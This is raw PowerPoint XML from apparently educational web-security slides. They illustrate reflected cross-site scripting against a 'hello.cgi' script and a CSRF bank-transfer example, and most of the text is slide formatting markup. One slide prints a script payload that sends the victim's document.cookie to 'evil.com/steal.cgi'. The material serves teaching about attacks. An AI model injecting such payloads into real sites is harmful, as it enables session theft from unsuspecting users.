            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="2208"/>
              <a:ext cx="1584" cy="4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70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GET/ hello.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>name=</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;script&gt;win.open(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>evil.com/steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>+</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>document.cookie)&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258517" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11015699" y="5420926"/>
            <a:ext cx="1585748" cy="78482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39" tIns="65020" rIns="130039" bIns="65020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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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6827520" y="6423379"/>
            <a:ext cx="4009813" cy="2896728"/>
            <a:chOff x="3024" y="2845"/>
            <a:chExt cx="1776" cy="1283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12315" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3024" y="2976"/>
              <a:ext cx="1776" cy="20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en-US" sz="280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40988" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2845"/>
              <a:ext cx="1584" cy="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bg2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2400">
                  <a:solidFill>
                    <a:schemeClr val="bg2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bg2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bg2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bg2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•"/>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="bg2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70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;HTML&gt;Hello, dear</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>win.open(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>evil.com/steal.cgi?cookie=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>+document.cookie)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Welcome!&lt;/HTML&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12317" name="AutoShape 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3281" y="3552"/>
              <a:ext cx="1375" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20546"/>
                <a:gd name="adj2" fmla="val -78819"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="127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>
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Interpreted as Javascript </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>by victim</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>s browser; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>opens window and calls </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>steal.cgi on evil.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258522" name="Picture 26" descr="j02159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907" y="3793067"/>
            <a:ext cx="650240" cy="433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8523" name="Picture 27" descr="j02159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120" y="3467946"/>
            <a:ext cx="433493" cy="288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975360" y="7888676"/>
            <a:ext cx="4876800" cy="672818"/>
            <a:chOff x="432" y="3494"/>
            <a:chExt cx="2160" cy="298"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12311" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="3494"/>
              <a:ext cx="1776" cy="20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l"/>
              <a:endParaRPr lang="en-US" sz="280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40984" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="3504"/>
              <a:ext cx="1584" cy="1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70000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12313" name="Picture 31" descr="j021594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6" y="3520"/>
              <a:ext cx="192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14" name="Picture 32" descr="j021594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3600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58529" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9317850" y="690882"/>
            <a:ext cx="3145084" cy="1043093"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28750"/>
              <a:gd name="adj2" fmla="val 254524"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3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130039" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Echoes user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;Hello, dear …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12309" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11054080" y="3833707"/>
            <a:ext cx="1625600" cy="758613"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 28569"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD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130039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10257087" y="2384214"/>
            <a:ext cx="1639798" cy="500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0039" tIns="65020" rIns="130039" bIns="65020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40458C"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53956440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8501" grpId="0" animBg="1"/>
      <p:bldP spid="1258502" grpId="0" animBg="1"/>
      <p:bldP spid="1258513" grpId="0" animBg="1"/>
      <p:bldP spid="12585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C8257-F941-4A47-8C0C-4D07454A8B09}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-25400" y="0"/>
            <a:ext cx="13030200" cy="14208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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF Attack: Bank Example*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="csrf_fig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888" y="1420416"/>
            <a:ext cx="9101811" cy="56886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3728" y="7325072"/>
            <a:ext cx="119533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charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Transfer money from one account to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>When the “Continue” button is pressed, an http POST request is submitted by the user browser to the server (bank)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510512" y="9125272"/>
            <a:ext cx="4608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Example courtesy https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>www.whitehatsec.com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172266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C8257-F941-4A47-8C0C-4D07454A8B09}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-25400" y="0"/>
            <a:ext cx="13030200" cy="14208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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF Attack: Bank Example*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3728" y="5380856"/>
            <a:ext cx="11953328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charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If the request was successful, $5,000 would be transferred from account “314159265” to account “01123581.” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>interesting is that many Web applications, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>transfer_funds.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, do not distinguish between parameters sent using GET or POST. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In other words, the same request with POST replaced with GET is completely legit as far as the server is concerned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="pos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69" y="1348408"/>
            <a:ext cx="11638154" cy="3456384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Explosion 2 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="525736" y="1276400"/>
            <a:ext cx="1944216" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="22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10512" y="9125272"/>
            <a:ext cx="4608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/>
              <a:t>Example courtesy https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>www.whitehatsec.com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511262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Subtitl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Title &amp; Bullets - Left">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets - Lef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Title &amp; Bullets - 2 Column">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets - 2 Colum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Title &amp; Bullets - Right">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets - Righ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Title, Bullets &amp; Photo">
  <a:themeElements>
    <a:clrScheme name="Title, Bullets &amp; Phot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Title &amp; Bullets copy 1">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 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copy 1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copy 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Title &amp; Bullets copy 2">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 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copy 2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copy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Title &amp; Bullets copy 3">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 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copy 3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copy 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Title &amp; Bullets copy 4">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 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copy 4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copy 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Bullets copy">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy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copy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cop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Title &amp; Bullets copy 5">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 5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copy 5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copy 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Title &amp; Bullets copy 6">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 6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copy 6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copy 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Title &amp; Bullets copy 7">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 7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copy 7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copy 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Title &amp; Bullets copy 8">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 8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copy 8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copy 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Title &amp; Bullets copy 9">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 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copy 9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copy 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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Title &amp; Bullets copy 10">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 1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copy 10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copy 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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Title &amp; Bullets copy 11">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 1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copy 11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copy 1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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Title &amp; Bullets copy 12">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy 1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copy 12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copy 1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8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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Title &amp; Bullets copy">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy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copy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cop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- Center">
  <a:themeElements>
    <a:clrScheme name="Title - Cen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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_Title &amp; Bullets copy">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy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copy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cop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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="4_Title &amp; Bullets copy">
  <a:themeElements>
    <a:clrScheme name="Title &amp; Bullets copy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copy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cop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Bullets">
  <a:themeElements>
    <a:clrScheme name="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hoto - Horizontal">
  <a:themeElements>
    <a:clrScheme name="Photo - Horizont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hoto - Horizontal Reflection">
  <a:themeElements>
    <a:clrScheme name="Photo - Horizont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 Reflectio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Horizont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Photo - Vertical">
  <a:themeElements>
    <a:clrScheme name="Photo - Vertic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Photo - Vertical Reflection">
  <a:themeElements>
    <a:clrScheme name="Photo - Vertic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 Reflectio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Vertic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le - Top">
  <a:themeElements>
    <a:clrScheme name="Title - To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Pages>0</Pages>
  <Words>1682</Words>
  <Characters>0</Characters>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Lines>0</Lines>
  <Paragraphs>263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31</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="51" baseType="lpstr">
      <vt:lpstr>Title &amp; Subtitle</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy</vt:lpstr>
      <vt:lpstr>Title - Center</vt:lpstr>
      <vt:lpstr>Bullets</vt:lpstr>
      <vt:lpstr>Photo - Horizontal</vt:lpstr>
